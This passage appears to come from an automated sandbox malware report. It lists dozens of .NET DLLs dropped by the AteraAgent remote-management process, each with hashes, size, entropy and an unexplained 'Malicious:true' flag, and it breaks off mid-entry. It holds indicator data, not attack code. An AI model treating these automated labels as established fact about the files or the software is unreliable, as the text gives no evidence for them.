                                                                                                                                                                                                                                                                                              SHA1:6F13A284F49B152F14ED6C23E41A4550CCEBD841
                                                                                                                                                                                                                                                                                              SHA-256:E679990416DF09D59345F070E659D13D3F8424FD04642D993989511BB188F7FB
                                                                                                                                                                                                                                                                                              SHA-512:2B23E0B70F345BE16D828537BCE22113DF136DA76F23B1227D11AEE653D5D73FB5CB87FACE86CB378F1C9CCAD564F1BF351C522F719716B02772389073CB64F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):99368
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.23639961491798
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:qnDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbaD763fJ:CitRK/XIgIZAXjD96WfLtGdM5baDC
                                                                                                                                                                                                                                                                                              MD5:4CBAE74F248C3612DED81C2750580F91
                                                                                                                                                                                                                                                                                              SHA1:6C0BE7421FDDEF471857829BEDB1E784C0876C95
                                                                                                                                                                                                                                                                                              SHA-256:090AE8D4CA0932EFDBA54F21062FEFF98AE780C849F28512EE70007521550EA6
                                                                                                                                                                                                                                                                                              SHA-512:ECA366B2A8C7918F4E165B21294929A5F4DC3A87593E43C6826C932F74DCCC4BF26BAE728CBCCAF3973E0ED47BC56A67DF8FF96D8EFE476830F4D73F7DF7D4F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.852040403345325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:CxGxIZWJjW5bPfNyby2sE9jBF6IYiYF85S35IVnxGUHFykNoc0xPex:C6oWJjWN3Nyb8E9VF6IYijSJIVxukycJ
                                                                                                                                                                                                                                                                                              MD5:D917DEA96F5B910E68D1F79E37B2DD91
                                                                                                                                                                                                                                                                                              SHA1:24F89EED7B3DE4C5E5544F00C738DE7A1EDD9805
                                                                                                                                                                                                                                                                                              SHA-256:2FC20781034A391AC60F35C94B3DB22383B7BFD17430BECF43460321566B0500
                                                                                                                                                                                                                                                                                              SHA-512:BD575B68678242BFC301D77807507180477572F8A23BA6341E60B12322FB85776540939D156CBBEE0377F2108FACE44AFF45F74D51F97D78FB7B941B0DDC1A23
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.771448960937668
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Cqk53/hW3fZ+zWqyNyb8E9VF6IYijSJIVxjpbu:Cqk53MmSEpYi60pu
                                                                                                                                                                                                                                                                                              MD5:7D50A7135BBAA5223A1F9295D134B3F5
                                                                                                                                                                                                                                                                                              SHA1:64EA8C06AC68779CE21B1E45ABAF0155FBCAFF74
                                                                                                                                                                                                                                                                                              SHA-256:14BB9215B0C82D2EABA0A76CC11B0E81D45426F43CE201F064137A182F174B68
                                                                                                                                                                                                                                                                                              SHA-512:DC2AC7152A217D438FE03749DFF22005E671ED633462CFD16D2EC2643FB4CD91D2C0890EAEA5954D704792BE227BFC072CCD0073FA147585EDC6BE21B4686FCD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.658255217483959
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:KFCc4Y4OJWfOWqWWOW7yNyb8E9VF6IYijSJIVxwOeQghm:6CcyCrSEpYi60Jj
                                                                                                                                                                                                                                                                                              MD5:541DD5FFC4E27C42B4510B20C7795763
                                                                                                                                                                                                                                                                                              SHA1:7A964AE8F8436D7D1B37774DE2CA0540B7785CB2
                                                                                                                                                                                                                                                                                              SHA-256:464341BE8209BE8A36F6FC5A1943408C3216F66D84D4410ED94689EFB1848920
                                                                                                                                                                                                                                                                                              SHA-512:F9690EB8C675829E194A0E8A4324843B683C28B4B3DE722C9099596202843161C98A013FE747A582C4EA47D72A5FB91DF7AC4548A393088B6F403A6B5338D6BF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8738938766861075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dAWxMWxiNyb8E9VF6IYijSJIVxMPtrWU/w4:dvjiEpYi604rRY4
                                                                                                                                                                                                                                                                                              MD5:5C01326F7B286C2DBBECB385A53395EE
                                                                                                                                                                                                                                                                                              SHA1:DFEFC096F4DE4FAE01B4B7B19CC05AEF2283A59E
                                                                                                                                                                                                                                                                                              SHA-256:29A698BEEBD5BA52CC04FE7B7A22928E90E006A7885A1F10EB2E1A6665511F54
                                                                                                                                                                                                                                                                                              SHA-512:EAC153B33457347BA56CD53ECB11CEE297C503D792A6BC3DA8AF5BF8E2E4AE3D4356C460CD68F345E7EA673F37ACD847E8B623D03E416F80794C0BEED1FA066B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.856217266564335
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:rYqArxbYWHaW5oPINyby2sE9jBF6IYiYF85S35IVnxGUHF2zfxGo6Dah:jAlcWHaWOQNyb8E9VF6IYijSJIVxyoLS
                                                                                                                                                                                                                                                                                              MD5:8EAF10A4BE6CF9FCFB560BE7BF63FBEB
                                                                                                                                                                                                                                                                                              SHA1:F20ABB136959EF3F40B82E712587983C13C8CF22
                                                                                                                                                                                                                                                                                              SHA-256:66A83605AF8E8462FAC61948656D7300C9EAD82CA230B0D45FA7AC81B2DE9124
                                                                                                                                                                                                                                                                                              SHA-512:588293D6043892C0DC1A46214BC4398E8C2513CB2C46B91CE9C996815083BFA25D9246089676F3ABA00F951B8A2937C1CBE83D808A72C49CB2B1FA71130CEEA7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7775085279315626
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1eIZnWlNWTaNyb8E9VF6IYijSJIVxpcstKT:kUyo6EpYi60Po
                                                                                                                                                                                                                                                                                              MD5:20430B56AF201F3DF8DC7ADD77C700DF
                                                                                                                                                                                                                                                                                              SHA1:B4D021243BEEE7CD50AB7885ABBF15F0BF530578
                                                                                                                                                                                                                                                                                              SHA-256:EB04AC7564191B2CBFE425BF0E1C5AFAFDD56E95EF43410B46849B859C607FCB
                                                                                                                                                                                                                                                                                              SHA-512:CEA66D7B73E25725696D5B46E1BB3D26280B15A7DB665AF6FAD75685D41D6A759291732559D7D95E9F99140AAC29C94F0393FD9A22084C6C20C347E55DBA560B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.492795908704385
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7lQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWZ+Nyb8E9VF65:JQq33333333kX+TBi8OGEpYi60/k
                                                                                                                                                                                                                                                                                              MD5:BAC4ED28712BC3D20E634372041074CC
                                                                                                                                                                                                                                                                                              SHA1:3035E7EBB1B7D9830FD3711231276506A8B5B59D
                                                                                                                                                                                                                                                                                              SHA-256:DC70596E0963C1256F437BCC4EE6529A7B97119C2484845498B142EB4A18A921
                                                                                                                                                                                                                                                                                              SHA-512:5D6D4F42FD3DE579874DA7B39569B00F3A9DECD12759929DE58AD9D1A436DE787AB0EA5D67FD6C1D6558463E7B47A1222F23F67A3182E1A7E8AA172DCD23A71A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.848738207274033
Encrypted:false
SSDEEP:384:728YFlXulWY/WGONyb8E9VF6IYijSJIVxKD9IPGp:70qX2EpYi60Tm
MD5:C1B2DE83AEF8C5E20E17941C4999C314
SHA1:20F7DCF53F0B030E70C84DF4E4277C93DFF6B6AA
SHA-256:7060B1D86EF099D021D16A649DE7137D8517C5E554E1F44B41173CA8B9994D73
SHA-512:3610FB8097A6A29529DD5E21D2BC8E7A3CBB18D2BE071FBE198308B3242D5EA6429BDAD47363D5BAE862F5FF837D0E2DAFB779CB9002E08D55D0E45A0FD13BAE
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):16424
Entropy (8bit):6.72671079918751
Encrypted:false
SSDEEP:384:duMLcdQ5MW9MWYONyb8E9VF6IYijSJIVx3EDQL:8OcSpS2EpYi60K+
MD5:A0D4D09BE1D6009408C6EB7E93768012
SHA1:4C1BDC43B169CDB2869C1C98DFE9A91EB15633D9
SHA-256:4B9138560B475B50BCBFCBD348A82CBF258E9886682CC05EA33BE2CBF0A03F48
SHA-512:7CEABCF983852EC62CFAE6C739092E09EC44FE7AB3904E248AA9DBA83F7BBD61E1DBF817BF92B4D59E3EA638A7271E5F3F63E614E93FCA123F21AAC25220AA37
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15912
Entropy (8bit):6.817024517717208
Encrypted:false
SSDEEP:384:sZ7RqXWDRqlRqj0RqFWqENyb8E9VF6IYijSJIVxVaJrCC:Q9qKqjqjuq5kEpYi60KCC
MD5:37F1EF0A6AA2466C2F554504C53C2D10
SHA1:31DD8D50CBE9C4595A7CC7D7815BA428227E9892
SHA-256:F79DC628564995DEEE92F105511FD82E8B3CA3929B6D67529730833DAE6C4E9F
SHA-512:0022E149D9CE976D56687781461E604759E0BC36E46E4D6A9B003F8F22ABB76B11B1CDD4E06A2718B1247C7BBA4AF15A94AC91F6FA43A9AAFA396FE993BF6301
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):20008
Entropy (8bit):6.628825890980245
Encrypted:false
SSDEEP:384:YNBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W7eNyb8E9VF6IYijSJIVx3dU2:YvMhF2SzNzwu/NljuQmEpYi6022
MD5:0F8AD89B93E9F4127DCB11B4F391AD46
SHA1:CD0374B06A4C3962F4E3FE177907059FE7EDC2C9
SHA-256:BC753E8BC6A07731B5BF2D5663150CD4691B322A04D82CC53A3E64FCA8D55FDF
SHA-512:6ED91FC9F2CCF9369BB6BC952035012AA5D5C5BA93A61CF98306E9E9DF843EAF8CCF0A6115C172D0A56B50BC2B5DCDBA5ED8A57CAD7D26C6E653C46976FFBCCE
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.898261756295843
Encrypted:false
SSDEEP:384:1Z4RLWdRfRJ0RZWDeNyb8E9VF6IYijSJIVxlydN:1ZK0pJuImEpYi60oP
MD5:292641CBE4EFE988E1D56A5245503090
SHA1:CDCC2464376F76994BABD97BF2A17A7D302E0153
SHA-256:DB686D7BCAAB90B5117C320CD799B9725773A764CBA52A78797ED3CBAE22BA54
SHA-512:821DCF439AC3C0C4A1DDABE1CF40B0FA0E6660940F7F9B585F23E21A4B5D2BFB809A38F1549397250A4733BC0E1FD42B12FC74A5D66BEE3942F2E7C23A07F7F6
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.796379783430149
Encrypted:false
SSDEEP:384:NYWsmWIyNyb8E9VF6IYijSJIVx39mFdcmx:N2wSEpYi60Qwmx
MD5:144114AEF753E8A677B4B2B8C4CC5BA4
SHA1:827364BEC24CFBD5FF52B1A0797BA3981E520FFB
SHA-256:07F2FD794258FAADAE4BBAE88B5C4C5A840F108087DEF92C970233D3D8AE8858
SHA-512:D3D7D4CF244B64787244C0547F4810C64B5B1A5FD7017FF215A68561C30DD609ED70B2BC81844996FD16D4064D88EF175CDFA63489622B4D72358B88D42E2A27
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):105000
Entropy (8bit):6.3817920096587635
Encrypted:false
SSDEEP:1536:qvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXBA760:mgk1tiLMYiDFvxqrWDWNoJXBAv
MD5:8DDFC9B1361578BDD5612ACC51313DA6
SHA1:630346D2670DE69362A3267DAE11EA6726003559
SHA-256:647D5BFA5108E79A1E1738C34C321088E7B8F30366881D94695DF52E547FADC9
SHA-512:F4B3AD4BD7C049C0F5D4408BB4834936E3EB5ECEE139F426F32704D40201EA75BCADF6B6EB32FE79B9F8AD1D609D739D2638E45693D5A8A55CFD933173A1FA7B
Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.855234936441404
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dKcuz1W1cWliNyb8E9VF6IYijSJIVxLnKXE:Xu8niEpYi60b/
                                                                                                                                                                                                                                                                                              MD5:054FDA357AAC158ABB7DCB603E618468
                                                                                                                                                                                                                                                                                              SHA1:30D78707EB7ED4B135A3DCC0D2789EF34EE5008B
                                                                                                                                                                                                                                                                                              SHA-256:D690AFCD79AB3F1E8FE0F87922A694F1207F23E7AF74B9D507CB0719B71E6162
                                                                                                                                                                                                                                                                                              SHA-512:91C419A37778A608310C1FFA4459942A2E64B8FEE8B03192D0AB78D879F52525CF37B5E2D31178A4C14FBD8BC58238127D275EF7FBCC18148FD48535E9B5C41B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.859586983074765
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:c+SWikW0uNyb8E9VF6IYijSJIVxAd5iwp:c+eGWEpYi60Cdp
                                                                                                                                                                                                                                                                                              MD5:6A9CCA0177140202310B5E38CA0C8FF4
                                                                                                                                                                                                                                                                                              SHA1:6443604982F8F9A3E1B5D713DB1E52D401CC0F52
                                                                                                                                                                                                                                                                                              SHA-256:F6B1EE80B31CC0383A6C4F7116BB84EBB41CFDD5AACEB43986308A146077F381
                                                                                                                                                                                                                                                                                              SHA-512:D34427448ADCFA0B140BA777FE0EF266AD04843C3848EA8EA238BA457EDFF2C1023E7E891A811433491A60B2834BAE734656D764B0F2FB55C6632517D1200BA9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.907435412972442
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:pDxxhREWzgW5APUNyby2sE9jBF6IYiYF85S35IVnxGUHF76am939Ys:FAWzgWSsNyb8E9VF6IYijSJIVxXm+s
                                                                                                                                                                                                                                                                                              MD5:8A94A3BFDE0A59D784A3408F43D7714E
                                                                                                                                                                                                                                                                                              SHA1:CE74C4C089A298FB2E53DB905E938ED866FD7CCC
                                                                                                                                                                                                                                                                                              SHA-256:266EEB7F43B68684C44E1926593F5F4DEAFD5048BC552835152DC9649E738F9E
                                                                                                                                                                                                                                                                                              SHA-512:4015E73F7C7099BEF4E2961A1AACD1F3AC25C99B54F92632E94DE0B3AB4F19E0144CDC5B06A56029A73C2A6644CDC990D2A11CA2BB5D5F31E92B6E07712CA4F8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.863130152483049
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:6BLRWbYWziZNyb8E9VF6IYijSJIVx7cHr:6B2xi9EpYi60YL
                                                                                                                                                                                                                                                                                              MD5:878FED5CA4CBAA9282B1EB608C2312CC
                                                                                                                                                                                                                                                                                              SHA1:D07131A22C8E51830D64607EA61A71FD0064A78E
                                                                                                                                                                                                                                                                                              SHA-256:91850B2A878630B4F96CF6B5D5695361BDA4D3E57A8589C8FB68CFF75FF3B761
                                                                                                                                                                                                                                                                                              SHA-512:631EC942C1FDF73C016694B345609B9D821A427E79D4190A21A12442C65650E793E74B2247978B23DE97D1109D885AD1C5F7031D18B7502B01E298355828272D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.85257775718915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:hZxcMRW4/W5TPPNyby2sE9jBF6IYiYF85S35IVnxGUHFyF5yzli:5HW4/W1HNyb8E9VF6IYijSJIVx+qU
                                                                                                                                                                                                                                                                                              MD5:4D61CCEF5CC2784846B379DE467BFCF7
                                                                                                                                                                                                                                                                                              SHA1:0F1A10F294CD97FB5B21CBFABE7D41A060F9DD38
                                                                                                                                                                                                                                                                                              SHA-256:E2E5B92DFA1195E2DD1DBD15D8E4C36365862C33105BCFF7E84CFA72F90CE512
                                                                                                                                                                                                                                                                                              SHA-512:969F11D0DEEE273AD68BC3C9B7224A3E38BA227077B0760332C7D603761A12594DD66338C58A08D798A67F00F91861CE104E792BAAA7D4014CC2304EB177EBFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.909083241813673
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/vk7hWmCWKpNyb8E9VF6IYijSJIVxug1fV:/s7/GtEpYi60HV
                                                                                                                                                                                                                                                                                              MD5:99D608EA299DB1E5E927AF7AD6F0D364
                                                                                                                                                                                                                                                                                              SHA1:E2625E44AEC5D3D2C53826E2B31A64AA54DF4C46
                                                                                                                                                                                                                                                                                              SHA-256:9711D1D2173CA18175118B8BBBC656BE11E18702EAC0047F6195889C60032BDF
                                                                                                                                                                                                                                                                                              SHA-512:80B8FC43E2F41649F19DFE954F2DD3FBA6CAFCE72AAAB4F0832017D672BCC93EA6E7187BD23056C256DEFF3150315789140B68336752042E34969ABC4F0EB70F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8725581182244815
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:pUiW2xf+C/WCUW5wP5Nyby2sE9jBF6IYiYF85S35IVnxGUHFLZiDSj+2m:fGMWCUWiBNyb8E9VF6IYijSJIVxR5q2m
                                                                                                                                                                                                                                                                                              MD5:827CC9E1385DEE08EB88BA4F82A8D037
                                                                                                                                                                                                                                                                                              SHA1:1F4FD3E05F15B1CEF11222EF9FB0E7278D7FF0D8
                                                                                                                                                                                                                                                                                              SHA-256:EE7208B11C25F2244F73C4C7FE84634E283CABFA3BF3F8AA8231FEAB8806B32D
                                                                                                                                                                                                                                                                                              SHA-512:D42CA3E72BF359CB8120051414D554A89A8D8E6E8D2463CE3684CFB32977F5437EB5FEDDA5A08080130DD24170BE8CE93F9CE4ACB9307D878B2C2C1CECCB37DD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.852073911727644
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1BhwI7WSQWEQNyb8E9VF6IYijSJIVxCtgRyl:1DwIBSoEpYi60a
                                                                                                                                                                                                                                                                                              MD5:96CC4DB802A18A19C634362EA07BF0CA
                                                                                                                                                                                                                                                                                              SHA1:5E73A7D50926A20ADF21C5A681CFD88E6782E36A
                                                                                                                                                                                                                                                                                              SHA-256:2C36B9CE0C5B3D2BD1437FA57DFCFE7E8C13BBA014BBAFD6895736A6654704C3
                                                                                                                                                                                                                                                                                              SHA-512:442D514BADBDFD84F67A1B5CC5C653F6EBF49A951657FED8C7BDFBD4D453D82AE9A3E3845BF3BEAA6B4380FA7E45E5531E6594BC3673788199C79FC7119EE884
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.870125259512271
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:FyvPRW4lWvKNyb8E9VF6IYijSJIVxnKq3u:s39oKEpYi60Fu
                                                                                                                                                                                                                                                                                              MD5:E86EF319DCB1A0C3A1C980B8179C28DF
                                                                                                                                                                                                                                                                                              SHA1:B7B384331A1F5A4ED7A1EB64B93A50D3D99543BA
                                                                                                                                                                                                                                                                                              SHA-256:CDF9D59E281EAD07334BAEDF6F929AA27AB968B7121B53EEE2406EADEFE901C3
                                                                                                                                                                                                                                                                                              SHA-512:A76AB5FB097CDCF658F4645AF58F4B9F4CE9B5B14683A7B2463598692D7835D969A0AB7C387CC96D9EEABE095E4223B40FA1EE8BD840F83144AC0B5818BBBF5A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.821263452437729
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:r6RW6eWX8Nyb8E9VF6IYijSJIVxiAcn/A:r67XcEpYi601c/A
                                                                                                                                                                                                                                                                                              MD5:5DE19C03111BAC441546E09C0986FFB8
                                                                                                                                                                                                                                                                                              SHA1:73A84A9DBB2C687D7B98675391F17919BE4A0E2D
                                                                                                                                                                                                                                                                                              SHA-256:E8B6180145EB52C8357A15E71EDC4F4A3CB103E2C9E3CA39DEF0837C25486FF4
